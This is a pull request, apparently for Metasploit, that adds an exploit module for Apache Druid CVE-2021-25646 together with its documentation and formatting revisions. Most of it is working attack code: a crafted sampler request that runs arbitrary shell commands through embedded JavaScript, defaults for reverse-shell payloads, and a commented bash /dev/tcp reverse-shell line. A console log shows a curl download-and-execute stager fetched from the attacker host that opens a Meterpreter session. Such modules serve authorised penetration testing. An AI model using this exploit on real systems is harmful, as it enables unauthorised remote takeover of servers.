### PR TITLE
Add Apache Druid CVE-2021-25646 RCE exploit

### DIFF
--- a/documentation/modules/exploit/linux/http/apache_druid_js_rce.md
+++ b/documentation/modules/exploit/linux/http/apache_druid_js_rce.md
@@ -12,13 +12,21 @@ such as cmd/unix/reverse_python
 It has been fixed in Apache Druid 0.20.1
 
 This module has been tested successfully against bebelow:
+
 Apache Druid 0.15.1 Debian 9.11 (Linux 3.10.0-957.21.3.el7.x86_64)
+
 Apache Druid 0.16.0-iap8  Ubuntu 16.04 (Linux 3.10.0-957.27.2.el7.x86_64)
+
 Apache Druid 0.17.1 CentOS 8.2.2004 (Core) (Linux 4.18.0-193.28.1.el8_2.x86_64)
+
 Apache Druid 0.18.0-iap3 Debian 9.12 (Linux 4.19.0-0.bpo.8-amd64)
+
 Apache Druid 0.19.0-iap7 Ubuntu 18.04 (Linux 4.14.193-149.317.amzn2.x86_64)
+
 Apache Druid 0.20.0-iap4.1 Ubuntu 18.04 (Linux 4.19.112+)
+
 Apache Druid 0.21.0-iap3 CentOS 7.9.2009 (Linux 3.10.0-1160.15.2.el7.x86_64)
+
 ### Setup
 
 Just use docker,but any other version you need to find by yourself

--- a/documentation/modules/exploit/linux/http/apache_druid_js_rce.md
+++ b/documentation/modules/exploit/linux/http/apache_druid_js_rce.md
@@ -1,0 +1,126 @@
+
+## Vulnerable Application
+Apache Druid
+### Description
+
+This module post json type request to Apache Druid with "config" is set to true, 
+and execute command in "function" with Javascript to exploit.
+But it seem that some payloads can't execute successfully and no reason,
+such as cmd/unix/reverse_python
+
+
+It has been fixed in Apache Druid 0.20.1
+
+This module has been tested successfully against bebelow:
+Apache Druid 0.15.1 Debian 9.11 (Linux 3.10.0-957.21.3.el7.x86_64)
+Apache Druid 0.16.0-iap8  Ubuntu 16.04 (Linux 3.10.0-957.27.2.el7.x86_64)
+Apache Druid 0.17.1 CentOS 8.2.2004 (Core) (Linux 4.18.0-193.28.1.el8_2.x86_64)
+Apache Druid 0.18.0-iap3 Debian 9.12 (Linux 4.19.0-0.bpo.8-amd64)
+Apache Druid 0.19.0-iap7 Ubuntu 18.04 (Linux 4.14.193-149.317.amzn2.x86_64)
+Apache Druid 0.20.0-iap4.1 Ubuntu 18.04 (Linux 4.19.112+)
+Apache Druid 0.21.0-iap3 CentOS 7.9.2009 (Linux 3.10.0-1160.15.2.el7.x86_64)
+### Setup
+
+Just use docker,but any other version you need to find by yourself
+
+docker pull fokkodriesprong/docker-druid
+docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/linux/http/apache_druid_js_rce`
+1. Do: `set rhosts <ip>`
+1. Do: `set lhost <ip>`
+1. Do: `set lport/srvport <ip>` if necessary
+1. Do: `run`
+1. You should get a shell.
+
+## Targets
+
+### 0 (Linux Dropper)
+
+This uses a Linux dropper to execute code.
+
+### 1 (Unix Command)
+
+This executes a Unix command.
+
+## Options
+
+### CHECKCMD
+
+You can set a customize command to check and get command exec result respond.
+Default is "id"
+
+
+## Scenarios
+
+### Apache Druid 0.20.0-iap4.1 on SaltStack Salt 3002.2 on Ubuntu 18.04 (Linux 4.19.112+)
+
+```
+msf6 > use exploit/linux/http/apache_druid_js_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/apache_druid_js_rce) > set rhosts 10.100.70.2
+rhosts => 10.100.70.2
+msf6 exploit(linux/http/apache_druid_js_rce) > set rport 8888
+rport => 8888
+msf6 exploit(linux/http/apache_druid_js_rce) > set verbose true
+verbose => true
+msf6 exploit(linux/http/apache_druid_js_rce) > options
+
+Module options (exploit/linux/http/apache_druid_js_rce):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   CHECKCMD  id               yes       The command to execute as checking vulnerability
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS    10.100.70.2      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT     8888             yes       The target port (TCP)
+   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT   8080             yes       The local port to listen on.
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                    no        The URI to use for this exploit (default is random)
+   VHOST                      no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.100.70.1      yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux (dropper)
+
+
+msf6 exploit(linux/http/apache_druid_js_rce) > run
+
+[*] Started reverse TCP handler on 10.100.70.1:4444
+[*] Using URL: http://0.0.0.0:8080/NCId0EEi0G9
+[*] Local IP: http://10.100.70.1:8080/NCId0EEi0G9
+[*] Generated command stager: ["curl -so /tmp/cdAZJjlU http://10.100.70.1:8080/NCId0EEi0G9;chmod +x /tmp/cdAZJjlU;/tmp/cdAZJjlU;rm -f /tmp/cdAZJjlU"]
+[*] Executing command /bin/bash`@~-c`@~curl -so /tmp/cdAZJjlU http://10.100.70.1:8080/NCId0EEi0G9;chmod +x /tmp/cdAZJjlU;/tmp/cdAZJjlU;rm -f /tmp/cdAZJjlU ......
+[*] Client 10.100.70.2 (curl/7.58.0) requested /NCId0EEi0G9
+[*] Sending payload to 10.100.70.2 (curl/7.58.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3008420 bytes) to 10.100.70.2
+[*] Meterpreter session 2 opened (10.100.70.1:4444 -> 10.100.70.2:59996) at 2021-03-31 10:56:03 +0800
+[*] Command Stager progress - 100.00% done (119/119 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 10.100.70.2
+OS           : Ubuntu 18.04 (Linux 4.19.112+)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+
+```

--- a/modules/exploits/linux/http/apache_druid_js_rce.rb
+++ b/modules/exploits/linux/http/apache_druid_js_rce.rb
@@ -11,55 +11,54 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-       'Name'           => 'Apache Druid <= 0.20.0 Remote Command Execution',
+       'Name'           => 'Apache Druid 0.20.0 Remote Command Execution',
        'Description'    => %q{
           Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests. 
-		  In Druid 0.20.0 and earlier, authenticated user can send a specially-crafted request with json type which set "config" to true .
-		  It can forces Druid to run user-provided JavaScript code for that request, regardless of server configuration. 
-		  More critically,most of Apache Druid don't need to any auth.
- 		  This can be leveraged to execute code on the target machine with the privileges of the Druid server process.
+          In Druid 0.20.0 and earlier, authenticated user can send a specially-crafted request with json type which set "config" to true .
+	  It can forces Druid to run user-provided JavaScript code for that request, regardless of server configuration. 
+	  More critically,most of Apache Druid don't need to any auth.
+ 	  This can be leveraged to execute code on the target machine with the privileges of the Druid server process.
 		  
-		  Tested Apache Druid 0.15.1/0.16.0-iap8/0.17.1/0.18.0-iap3/0.19.0-iap7/0.20.0-iap4.1/0.21.0-iap3
-		  This module add CHECKCMD allow customize the cmd to check,which can replace exec in payloads.
-		  The module still exit many bug, for example, target sometime will wget/curl many time but I can't find any reason.
-		  },
-		'Author'         => [
-			'Litch1, Security Team of Alibaba Cloud', # Vulnerability discovery
-			'je5442804', # Metasploit module
-		],
-		'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
-		'References'     => [
-			['CVE', '2021-25646'],
-			['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25646'],
-			['URL', 'https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E'],
-			['URL', 'https://github.com/yaunsky/cve-2021-25646/blob/main/cve-2021-25646.py']
-		],
-		'DisclosureDate' => 'Jan 21 2021',
-		'License'        => MSF_LICENSE,
-		'Platform'       => [ 'unix', 'linux' ],
-		'Targets'        => [
-		['Linux (dropper)', {
-			'Platform'    => 'linux',
-			'Type' => :linux_dropper,
-			'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'curl'},
-			'CmdStagerFlavor' => %w[curl wget],
-			'Arch'        => [ARCH_X86, ARCH_X64]
-		}],
-		['Unix (in-memory)',{
-		   'Platform' => 'unix',
-		   'Arch' => ARCH_CMD,
-		   'Type' => :unix_memory,
-		   'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+	  Tested Apache Druid 0.15.1/0.16.0-iap8/0.17.1/0.18.0-iap3/0.19.0-iap7/0.20.0-iap4.1/0.21.0-iap3
+	  This module add CHECKCMD allow customize the cmd to check,which can replace exec in payloads.
+	  The module still exit many bug, for example, target sometime will wget/curl many time but I can't find any reason.
+	 },
+        'Author'         => [
+	  'Litch1, Security Team of Alibaba Cloud', # Vulnerability discovery
+	  'je5442804', # Metasploit module
+	],
+	'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+	'References'     => [
+	        ['CVE', '2021-25646'],
+	        ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25646'],
+	        ['URL', 'https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E'],
+                ['URL', 'https://github.com/yaunsky/cve-2021-25646/blob/main/cve-2021-25646.py']
+	],
+        'DisclosureDate' => 'Jan 21 2021',
+        'License'        => MSF_LICENSE,
+        'Platform'       => [ 'unix', 'linux' ],
+        'Targets'        => [
+         ['Linux (dropper)', {
+		'Platform'    => 'linux',
+		'Type' => :linux_dropper,
+		'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'curl'},
+		'CmdStagerFlavor' => %w[curl wget],
+		'Arch'        => [ARCH_X86, ARCH_X64]
+	}],
+	['Unix (in-memory)',{
+		'Platform' => 'unix',
+		'Arch' => ARCH_CMD,
+		'Type' => :unix_memory,
+		'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
         }],
-		],
-      'DefaultTarget'  => 0,
-	  'Privileged' => true
+        ],
+       'DefaultTarget'  => 0,
+       'Privileged' => true
     ))
 
-    register_options(
-      [
-        Opt::RPORT(8888),
-		OptString.new('CHECKCMD', [ true, 'The command to execute as checking vulnerability', 'id'])
+       register_options([
+          Opt::RPORT(8888),
+	  OptString.new('CHECKCMD', [ true, 'The command to execute as checking vulnerability', 'id'])
       ])
   end
   def execute_command(cmd, opts = {})
@@ -111,30 +110,31 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-	if datastore['CHECKCMD'].empty?
-		return CheckCode::Unknown("CHECKCMD can not be empty!")
-	else
-		res = execute_command("#{datastore['CHECKCMD']}")
-	end
-	unless res
+    if datastore['CHECKCMD'].empty?
+      return CheckCode::Unknown("CHECKCMD can not be empty!")
+    else
+      res = execute_command("#{datastore['CHECKCMD']}")
+    end
+    unless res
       return CheckCode::Unknown('Connection failed.')
     end
     unless res.code == 200
       return CheckCode::Safe
     end
-	if res.body.include?('data') && res.body.include?('test')
-	  return CheckCode::Vulnerable("- CMD response! =>\n" + JSON.parse(res.body)['data'][0]['parsed']['test'])
-	end
-	return CheckCode::Unknown("Target seem isn't Apache Druid")
-  end
+    if res.body.include?('data') && res.body.include?('test')
+      return CheckCode::Vulnerable("- CMD response! =>\n" + JSON.parse(res.body)['data'][0]['parsed']['test'])
+    end
+      return CheckCode::Unknown("Target seem isn't Apache Druid")
+    end
 
   def exploit
-	case target['Type']
-	when :linux_dropper
-		execute_cmdstager
-	when :unix_memory
-		execute_command(payload.encoded)
-	end
+    case target['Type']
+      when :linux_dropper
+        execute_cmdstager
+      when :unix_memory
+        execute_command(payload.encoded)
+      end
 	
   end
+
  end

--- a/modules/exploits/linux/http/apache_druid_js_rce.rb
+++ b/modules/exploits/linux/http/apache_druid_js_rce.rb
@@ -1,0 +1,140 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+       'Name'           => 'Apache Druid <= 0.20.0 Remote Command Execution',
+       'Description'    => %q{
+          Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests. 
+		  In Druid 0.20.0 and earlier, authenticated user can send a specially-crafted request with json type which set "config" to true .
+		  It can forces Druid to run user-provided JavaScript code for that request, regardless of server configuration. 
+		  More critically,most of Apache Druid don't need to any auth.
+ 		  This can be leveraged to execute code on the target machine with the privileges of the Druid server process.
+		  
+		  Tested Apache Druid 0.15.1/0.16.0-iap8/0.17.1/0.18.0-iap3/0.19.0-iap7/0.20.0-iap4.1/0.21.0-iap3
+		  This module add CHECKCMD allow customize the cmd to check,which can replace exec in payloads.
+		  The module still exit many bug, for example, target sometime will wget/curl many time but I can't find any reason.
+		  },
+		'Author'         => [
+			'Litch1, Security Team of Alibaba Cloud', # Vulnerability discovery
+			'je5442804', # Metasploit module
+		],
+		'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+		'References'     => [
+			['CVE', '2021-25646'],
+			['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25646'],
+			['URL', 'https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E'],
+			['URL', 'https://github.com/yaunsky/cve-2021-25646/blob/main/cve-2021-25646.py']
+		],
+		'DisclosureDate' => 'Jan 21 2021',
+		'License'        => MSF_LICENSE,
+		'Platform'       => [ 'unix', 'linux' ],
+		'Targets'        => [
+		['Linux (dropper)', {
+			'Platform'    => 'linux',
+			'Type' => :linux_dropper,
+			'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'curl'},
+			'CmdStagerFlavor' => %w[curl wget],
+			'Arch'        => [ARCH_X86, ARCH_X64]
+		}],
+		['Unix (in-memory)',{
+		   'Platform' => 'unix',
+		   'Arch' => ARCH_CMD,
+		   'Type' => :unix_memory,
+		   'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+        }],
+		],
+      'DefaultTarget'  => 0,
+	  'Privileged' => true
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(8888),
+		OptString.new('CHECKCMD', [ true, 'The command to execute as checking vulnerability', 'id'])
+      ])
+  end
+  def execute_command(cmd, opts = {})
+	gencmd = "/bin/bash`@~-c`@~"+cmd
+	vprint_status("Executing command #{gencmd} ......")
+	post_data = {
+		"type": "index",
+		"spec": {
+			"ioConfig": {
+				"type": "index",
+				"firehose": {
+					"type": "local",
+					"baseDir": "/etc",
+					"filter": "passwd"
+				}
+			},
+			"dataSchema": {
+				"dataSource": "%%DATASOURCE%%",
+				"parser": {
+					"parseSpec": {
+						"format": "javascript",
+						"timestampSpec": {},
+						"dimensionsSpec": {},                           #/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp// 0>&1
+						"function": "function(){var s = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"#{gencmd}\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"2021-03-28T12:41:27Z\",test: s}}",
+						"": {
+							"enabled": "true"
+						}
+					}
+				}
+			}
+		},
+		"samplerConfig": {
+			"numRows": 10
+		}
+	}.to_json
+	res = send_request_cgi({
+	  'method' => 'POST',
+	  'uri'    => '/druid/indexer/v1/sampler',
+	  'ctype' => 'application/json',
+	  'headers' => {
+		'User-Agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0',
+		'Accept' => 'application/json, text/plain, */*',
+		'Accept-Language' => 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
+		'Connection' => 'keep-alive'
+	  },
+	  'data' => post_data
+	})
+	return res
+  end
+
+  def check
+	if datastore['CHECKCMD'].empty?
+		return CheckCode::Unknown("CHECKCMD can not be empty!")
+	else
+		res = execute_command("#{datastore['CHECKCMD']}")
+	end
+	unless res
+      return CheckCode::Unknown('Connection failed.')
+    end
+    unless res.code == 200
+      return CheckCode::Safe
+    end
+	if res.body.include?('data') && res.body.include?('test')
+	  return CheckCode::Vulnerable("- CMD response! =>\n" + JSON.parse(res.body)['data'][0]['parsed']['test'])
+	end
+	return CheckCode::Unknown("Target seem isn't Apache Druid")
+  end
+
+  def exploit
+	case target['Type']
+	when :linux_dropper
+		execute_cmdstager
+	when :unix_memory
+		execute_command(payload.encoded)
+	end
+	
+  end
+ end

--- a/modules/exploits/linux/http/apache_druid_js_rce.rb
+++ b/modules/exploits/linux/http/apache_druid_js_rce.rb
@@ -4,8 +4,8 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-
   Rank = ExcellentRanking
+
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
 
@@ -13,43 +13,43 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
        'Name'           => 'Apache Druid 0.20.0 Remote Command Execution',
        'Description'    => %q{
-          Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests. 
+          Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests.
           In Druid 0.20.0 and earlier, authenticated user can send a specially-crafted request with json type which set "config" to true .
-	  It can forces Druid to run user-provided JavaScript code for that request, regardless of server configuration. 
-	  More critically,most of Apache Druid don't need to any auth.
- 	  This can be leveraged to execute code on the target machine with the privileges of the Druid server process.
-		  
-	  Tested Apache Druid 0.15.1/0.16.0-iap8/0.17.1/0.18.0-iap3/0.19.0-iap7/0.20.0-iap4.1/0.21.0-iap3
-	  This module add CHECKCMD allow customize the cmd to check,which can replace exec in payloads.
-	  The module still exit many bug, for example, target sometime will wget/curl many time but I can't find any reason.
-	 },
-        'Author'         => [
-	  'Litch1, Security Team of Alibaba Cloud', # Vulnerability discovery
-	  'je5442804', # Metasploit module
-	],
-	'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
-	'References'     => [
-	        ['CVE', '2021-25646'],
-	        ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25646'],
-	        ['URL', 'https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E'],
-                ['URL', 'https://github.com/yaunsky/cve-2021-25646/blob/main/cve-2021-25646.py']
-	],
+          It can forces Druid to run user-provided JavaScript code for that request, regardless of server configuration.
+          More critically,most of Apache Druid don't need to any auth.
+          This can be leveraged to execute code on the target machine with the privileges of the Druid server process.
+
+          Tested Apache Druid 0.15.1/0.16.0-iap8/0.17.1/0.18.0-iap3/0.19.0-iap7/0.20.0-iap4.1/0.21.0-iap3
+          This module add CHECKCMD allow customize the cmd to check,which can replace exec in payloads.
+          The module still exit many bug, for example, target sometime will wget/curl many time but I can't find any reason.
+         },
+       'Author'         => [
+          'Litch1, Security Team of Alibaba Cloud', # Vulnerability discovery
+          'je5442804', # Metasploit module
+         ],
+       'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+       'References'     => [
+            ['CVE', '2021-25646'],
+            ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25646'],
+            ['URL', 'https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E'],
+            ['URL', 'https://github.com/yaunsky/cve-2021-25646/blob/main/cve-2021-25646.py']
+        ],
         'DisclosureDate' => 'Jan 21 2021',
         'License'        => MSF_LICENSE,
         'Platform'       => [ 'unix', 'linux' ],
         'Targets'        => [
          ['Linux (dropper)', {
-		'Platform'    => 'linux',
-		'Type' => :linux_dropper,
-		'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'curl'},
-		'CmdStagerFlavor' => %w[curl wget],
-		'Arch'        => [ARCH_X86, ARCH_X64]
-	}],
-	['Unix (in-memory)',{
-		'Platform' => 'unix',
-		'Arch' => ARCH_CMD,
-		'Type' => :unix_memory,
-		'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+           'Platform'    => 'linux',
+           'Type' => :linux_dropper,
+           'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'curl'},
+           'CmdStagerFlavor' => %w[curl wget],
+           'Arch'        => [ARCH_X86, ARCH_X64]
+         }],
+         ['Unix (in-memory)',{
+           'Platform' => 'unix',
+           'Arch' => ARCH_CMD,
+           'Type' => :unix_memory,
+                   'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
         }],
         ],
        'DefaultTarget'  => 0,
@@ -58,55 +58,55 @@ class MetasploitModule < Msf::Exploit::Remote
 
        register_options([
           Opt::RPORT(8888),
-	  OptString.new('CHECKCMD', [ true, 'The command to execute as checking vulnerability', 'id'])
+          OptString.new('CHECKCMD', [ true, 'The command to execute as checking vulnerability', 'id'])
       ])
   end
+
   def execute_command(cmd, opts = {})
-	gencmd = "/bin/bash`@~-c`@~"+cmd
-	vprint_status("Executing command #{gencmd} ......")
-	post_data = {
-		"type": "index",
-		"spec": {
-			"ioConfig": {
-				"type": "index",
-				"firehose": {
-					"type": "local",
-					"baseDir": "/etc",
-					"filter": "passwd"
-				}
-			},
-			"dataSchema": {
-				"dataSource": "%%DATASOURCE%%",
-				"parser": {
-					"parseSpec": {
-						"format": "javascript",
-						"timestampSpec": {},
-						"dimensionsSpec": {},                           #/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp// 0>&1
-						"function": "function(){var s = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"#{gencmd}\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"2021-03-28T12:41:27Z\",test: s}}",
-						"": {
-							"enabled": "true"
-						}
-					}
-				}
-			}
-		},
-		"samplerConfig": {
-			"numRows": 10
-		}
-	}.to_json
-	res = send_request_cgi({
-	  'method' => 'POST',
-	  'uri'    => '/druid/indexer/v1/sampler',
-	  'ctype' => 'application/json',
-	  'headers' => {
-		'User-Agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0',
-		'Accept' => 'application/json, text/plain, */*',
-		'Accept-Language' => 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
-		'Connection' => 'keep-alive'
-	  },
-	  'data' => post_data
-	})
-	return res
+        gencmd = "/bin/bash`@~-c`@~"+cmd
+        vprint_status("Executing command #{gencmd} ......")
+        post_data = {
+                "type": "index",
+                "spec": {
+                        "ioConfig": {
+                                "type": "index",
+                                "firehose": {
+                                        "type": "local",
+                                        "baseDir": "/etc",
+                                        "filter": "passwd"
+                                }
+                        },
+                        "dataSchema": {
+                                "dataSource": "%%DATASOURCE%%",
+                                "parser": {
+                                        "parseSpec": {
+                                                "format": "javascript",
+                                                "timestampSpec": {},
+                                                "dimensionsSpec": {},                           #/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp// 0>&1
+                                                "function": "function(){var s = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"#{gencmd}\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"2021-03-28T12:41:27Z\",test: s}}",
+                                                "": {
+                                                        "enabled": "true"
+                                                }
+                                        }
+                                }
+                        }
+                },
+                "samplerConfig": {
+                        "numRows": 10
+                }
+        }.to_json
+        res = send_request_cgi({
+          'method' => 'POST',
+          'uri'    => '/druid/indexer/v1/sampler',
+          'ctype' => 'application/json',
+          'headers' => {
+                'Accept' => 'application/json, text/plain, */*',
+                'Accept-Language' => 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
+                'Connection' => 'keep-alive'
+          },
+          'data' => post_data
+        })
+        return res
   end
 
   def check
@@ -121,8 +121,8 @@ class MetasploitModule < Msf::Exploit::Remote
     unless res.code == 200
       return CheckCode::Safe
     end
-    if res.body.include?('data') && res.body.include?('test')
-      return CheckCode::Vulnerable("- CMD response! =>\n" + JSON.parse(res.body)['data'][0]['parsed']['test'])
+    if res.body.include?('data') & res.body.include?('test')
+      return CheckCode::Vulnerable("- CMD response! =>\n #{JSON.parse(res.body)['data'][0]['parsed']['test']}")
     end
       return CheckCode::Unknown("Target seem isn't Apache Druid")
     end
@@ -134,7 +134,8 @@ class MetasploitModule < Msf::Exploit::Remote
       when :unix_memory
         execute_command(payload.encoded)
       end
-	
+
   end
 
  end
+


### PR DESCRIPTION
This module post json type request to Apache Druid with "config" is set to true, 
and execute command in "function" with Javascript to exploit.
But it seem that some payloads can't execute successfully and no reason,
such as cmd/unix/reverse_python

It has been fixed in Apache Druid 0.20.1
This module has been tested successfully against below:

Apache Druid 0.15.1 Debian 9.11 (Linux 3.10.0-957.21.3.el7.x86_64)

Apache Druid 0.16.0-iap8  Ubuntu 16.04 (Linux 3.10.0-957.27.2.el7.x86_64)

Apache Druid 0.17.1 CentOS 8.2.2004 (Core) (Linux 4.18.0-193.28.1.el8_2.x86_64)

Apache Druid 0.18.0-iap3 Debian 9.12 (Linux 4.19.0-0.bpo.8-amd64)

Apache Druid 0.19.0-iap7 Ubuntu 18.04 (Linux 4.14.193-149.317.amzn2.x86_64)

Apache Druid 0.20.0-iap4.1 Ubuntu 18.04 (Linux 4.19.112+)

Apache Druid 0.21.0-iap3 CentOS 7.9.2009 (Linux 3.10.0-1160.15.2.el7.x86_64)


## Verification


- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/apache_druid_js_rce`
- [ ] `set rhosts <ip>`
- [ ] `set lhost<ip>`
- [ ] `set lport/srvport <ip>` if necessary
- [ ] `run`
- [ ] `You should get a shell`
